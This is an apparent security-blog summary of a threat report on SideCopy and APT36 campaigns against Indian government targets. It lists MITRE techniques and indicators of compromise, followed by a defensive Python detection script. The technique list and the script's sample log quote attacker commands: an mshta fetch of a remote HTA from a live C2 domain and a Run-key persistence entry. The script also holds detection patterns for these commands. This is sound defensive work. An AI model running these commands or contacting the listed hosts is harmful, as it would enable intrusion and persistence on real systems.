Pakistani APTs Escalate Attacks on Indian Gov. Seqrite Labs Unveils Threats and Connections – Blogs on Information Technology, Network & Cybersecurity | Seqrite

Seqrite Labs tracks campaigns by Pakistan-linked APTs SideCopy and APT36 (Transparent Tribe) targeting Indian government entities, noting multiple campaigns employing AllaKore and Crimson RATs and linking actors through shared infrastructure. The report details infection chains, decoys, C2 communications, and overlaps in tooling and domains to establish associations between the groups. #SideCopy #APT36 #TransparentTribe #AllaKore #CrimsonRAT

Keypoints

  • SideCopy deployed two variants of AllaKore RAT across three campaigns, using compromised domains to host payloads.
  • Transparent Tribe (APT36) repeatedly used Crimson RAT, including encoded or packed versions, sometimes aligned with Linux payloads and shared code.
  • Campaigns leverage spear-phishing with LNK archive files, followed by MSHTA execution to fetch remote HTA content.
  • Persistence is achieved via Run keys in the Registry, and multiple decoy documents are used to mislead victims.
  • Infrastructure overlaps (IP addresses, domains, and C2 servers) link campaigns to SideCopy and APT36 with high confidence.
  • AllaKore and Crimson RATs feature extensive data collection (system info, file enumeration, keylogging, clipboard theft) and multi-stage C2 communications with encrypted channels.

MITRE Techniques

  • [T1566.001] Phishing: Spearphishing Attachment – Spear-phishing starts with an archive file containing a shortcut (LNK) in a double-extension format. ‘Spear-phishing starts with an archive file containing a shortcut (LNK) in a double-extension format.’
  • [T1566.002] Phishing: Spearphishing Link – Opening the LNK triggers the MSHTA process, which executes a remote HTA file hosted on a compromised domain. ‘Opening the LNK triggers the MSHTA process, which executes a remote HTA file hosted on a compromised domain.’
  • [T1218.005] Mshta – MSHTA process executes a remote HTA file as part of the initial stage. ‘Opening the LNK triggers the MSHTA process, which executes a remote HTA file hosted on a compromised domain.’
  • [T1036.005] Masquerading: Double File Extension – The infection chain uses a double-extension format to disguise files. ‘archive file containing a shortcut (LNK) in a double-extension format.’
  • [T1140] Deobfuscate/Decode Files or Information – Embedded files are base64 encoded and decoded during the second stage. ‘base64 encoded.’
  • [T1547.001] Registry Run Keys / Startup Folder – Persistence is set via a Run registry key. ‘REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "issas" /t REG_SZ /F /D "C:\Users\Public\issas\issas.exe"’
  • [T1056.001] Input Capture: Keylogging – AllaKore functionality includes keylogging. ‘Keylogging’
  • [T1113] Clipboard Data – The RAT steals clipboard data as part of its data collection.
  • [T1083] File and Directory Discovery – AllaKore enumerates files and folders. ‘Enumerating files and folders’
  • [T1105] Ingress Tool Transfer – The malware uploads and downloads payloads during its operation. ‘Upload and execute files’
  • [T1571] Encrypted Channel – C2 communications use encrypted strings and channels. ‘Encrypted strings used for C2 communication’ and ‘Encrypted Channel’
  • [T1071.001] Application Layer Protocol: Web Protocols – C2 communication over web protocols. ‘Application Layer Protocol: Web Protocols’
  • [T1041] Exfiltration Over C2 Channel – Data is exfiltrated over the C2 channel. ‘Exfiltration Over C2 Channel’

Indicators of Compromise

  • [HTA] 6cdc79655e9866e31f6c901d0a05401d – jfhdsjfh34frjkfs23432.hta
  • [HTA] dbf196ccb2fe4b6fb01f93a603056e55 – flutter.hta
  • [HTA] 37b10e4ac08534ec36a59be0009a63b4 – plugins.hta
  • [HTA] d907284734ea5bf3bd277e118b6c51f0 – bjihfsdfhdjsh234234.hta
  • [HTA] 2a47ea398397730681f121f13efd796f – plugins.hta
  • [HTA] 6ab0466858eb6d71d830e7b2e86dab03 – flutter.hta
  • [HTA] ecc65e6074464706bb2463cb74f576f7 – 4358437iufgdshvjy5843765.hta
  • [HTA] da529e7b6056a055e3bbbace20740ee9 – min-js.hta
  • [HTA] cadafc6a91fc4bba33230baed9a8a338 – nodejsmin.hta
  • [DLL] 1e5285ee087c0d73c76fd5b0b7bc787c – hta.dll
  • [DLL] f74c59fd5b835bf7630fbf885d6a21aa – hta.dll
  • [DLL] 3cc6602a1f8a65b5c5e855df711edeb0 – hta.dll
  • [DLL] 990bfd8bf27be13cca9fa1fa07a28350 – SummitOfBion.dll
  • [File] 29fa44d559b4661218669aa958851a59 – SummitOfBion.dll
  • [File] 26bde2d6a60bfc6ae472c0e9c8d976e2 – SummitOfBion.dll
  • [PDB] Windows.Management.Workplace.WorkplaceSettings.pdb – msdr.dll
  • [PDB] dbghelp.pdb – braveservice.dll
  • [Domain] revivelife.in – associated assets/js/…/new/ and assets/js/…/grant/
  • [Domain] smokeworld.in – associated assets
  • [Domain] vparking.online – associated assets
  • [IP] 151.106.97.183 – compromised domain hosting (revivelife, vparking)
  • [IP] 162.241.85.104 – compromised domain hosting (ssynergy, elf in dia)
  • [IP] 164.68.102.44 – Contabo/Germany-based C2
  • [IP] 213.136.94.11 – Contabo/Germany-based C2
  • [URL] hxxps://revivelife.in/assets/js/other/new/ – C2 hosting
  • [URL] hxxps://revivelife.in/assets/js/other/grant/ – C2 hosting
  • [File] Grant_of_Risk_and_HardShip_Allowances_Mar_24.pdf – decoy document
  • [File] Imp message from dgms.xlam – decoy document
  • [Host] C:\ProgramData\HP\flutter.hta – host path
  • [Host] C:\Users\Public\issas\issas.exe – host path
  • [Host] C:\Users\Public\quick\quick.exe – host path

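As an added example (not code from the Seqrite write-up), the script below turns the behaviours listed under MITRE Techniques (MSHTA fetching a remote HTA, REG ADD to a Run key pointing into a public directory, double-extension LNK lures) and the hashes, domains and IPs from the Indicators of Compromise list into detection rules and runs them over a handful of constructed process-telemetry lines. The pipe-separated log format, its field names and the sample events are assumptions made for the example; the indicator values are the ones quoted on this page.

```python
import re
from dataclasses import dataclass

# Indicators copied from the IoC list above (Seqrite Labs write-up).
IOC_DOMAINS = {"revivelife.in", "smokeworld.in", "vparking.online"}
IOC_IPS = {"151.106.97.183", "162.241.85.104", "164.68.102.44", "213.136.94.11"}
IOC_MD5 = {
    "6cdc79655e9866e31f6c901d0a05401d",  # jfhdsjfh34frjkfs23432.hta
    "dbf196ccb2fe4b6fb01f93a603056e55",  # flutter.hta
    "1e5285ee087c0d73c76fd5b0b7bc787c",  # hta.dll
    "990bfd8bf27be13cca9fa1fa07a28350",  # SummitOfBion.dll
}

# Behavioural patterns taken from the technique list above.
REMOTE_HTA_RE = re.compile(r"https?://([a-z0-9.-]+)[^\s\"']*?\.hta\b", re.I)
RUN_KEY_RE = re.compile(
    r"HK(?:CU|LM)\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?\b", re.I)
PUBLIC_PATH_RE = re.compile(r"C:\\(?:Users\\Public|ProgramData)\\", re.I)
DOUBLE_EXT_LNK_RE = re.compile(r"\.(?:pdf|docx?|xlsx?|xlam)\.lnk\b", re.I)


@dataclass(frozen=True)
class Finding:
    line_no: int
    rule: str
    detail: str


def parse_line(line):
    """Assumed log format: ts|image|cmdline|md5|dst (five pipe-separated fields)."""
    parts = line.rstrip("\n").split("|")
    if len(parts) != 5:
        raise ValueError(f"expected 5 fields, got {len(parts)}: {line!r}")
    ts, image, cmdline, md5, dst = parts
    return {"ts": ts, "image": image, "cmdline": cmdline,
            "md5": md5.lower(), "dst": dst}


def analyse(line_no, ev):
    """Apply every rule to one parsed event; return the findings it triggers."""
    out = []
    exe = ev["image"].rsplit("\\", 1)[-1].lower()
    cmd = ev["cmdline"]
    # T1218.005: mshta.exe pulling an .hta over HTTP(S); note whether the host is a listed IoC.
    if exe == "mshta.exe":
        m = REMOTE_HTA_RE.search(cmd)
        if m:
            host = m.group(1).lower()
            tag = "known_ioc_domain" if host in IOC_DOMAINS else "unknown_domain"
            out.append(Finding(line_no, "mshta_remote_hta", f"{host} ({tag})"))
    # T1547.001: reg.exe adding a Run value; a payload under C:\Users\Public or C:\ProgramData is the pattern seen here.
    if exe == "reg.exe" and RUN_KEY_RE.search(cmd) and re.search(r"\bADD\b", cmd, re.I):
        sev = "public_dir_payload" if PUBLIC_PATH_RE.search(cmd) else "run_key_write"
        out.append(Finding(line_no, "run_key_persistence", sev))
    # T1036.005: document-looking name with a trailing .lnk extension.
    m = DOUBLE_EXT_LNK_RE.search(cmd)
    if m:
        out.append(Finding(line_no, "double_extension_lnk", m.group(0)))
    # Atomic indicators: file hash and network destination.
    if ev["md5"] in IOC_MD5:
        out.append(Finding(line_no, "ioc_hash", ev["md5"]))
    if ev["dst"] in IOC_IPS or ev["dst"].lower() in IOC_DOMAINS:
        out.append(Finding(line_no, "ioc_network", ev["dst"]))
    return out


def scan_log(lines):
    findings = []
    for n, line in enumerate(lines, 1):
        if line.strip():
            findings.extend(analyse(n, parse_line(line)))
    return findings


def summarise(findings):
    counts = {}
    for f in findings:
        counts[f.rule] = counts.get(f.rule, 0) + 1
    return counts


# Constructed sample telemetry (not real captured data): four suspicious events and two benign ones.
SAMPLE_LOG = [
    r"2024-03-18T09:01:11|C:\Windows\explorer.exe|explorer.exe D:\Downloads\decoy_document.pdf.lnk||",
    r"2024-03-18T09:01:12|C:\Windows\System32\mshta.exe|mshta https://revivelife.in/assets/js/other/new/flutter.hta||151.106.97.183",
    r'2024-03-18T09:01:20|C:\Windows\System32\reg.exe|REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "issas" /t REG_SZ /F /D "C:\Users\Public\issas\issas.exe"||',
    r"2024-03-18T09:01:25|C:\Users\Public\issas\issas.exe|issas.exe|1e5285ee087c0d73c76fd5b0b7bc787c|164.68.102.44",
    r"2024-03-18T10:15:00|C:\Windows\System32\mshta.exe|mshta.exe C:\Tools\inventory.hta||",
    r"2024-03-18T10:16:02|C:\Program Files\Browser\browser.exe|browser.exe https://example.org/||example.org",
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.rule} -> {f.detail}")
    print(summarise(scan_log(SAMPLE_LOG)))
```

The behavioural rules fire on the benign-looking parts of the chain (a local HTA run by mshta.exe is ignored, a remote one is not), while the atomic indicators only catch what is already on the list; in practice the mshta and Run-key rules are the ones that keep working after the actor rotates domains and rebuilds payloads.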
Read more: https://www.seqrite.com/blog/pakistani-apts-escalate-attacks-on-indian-gov-seqrite-labs-unveils-threats-and-connections/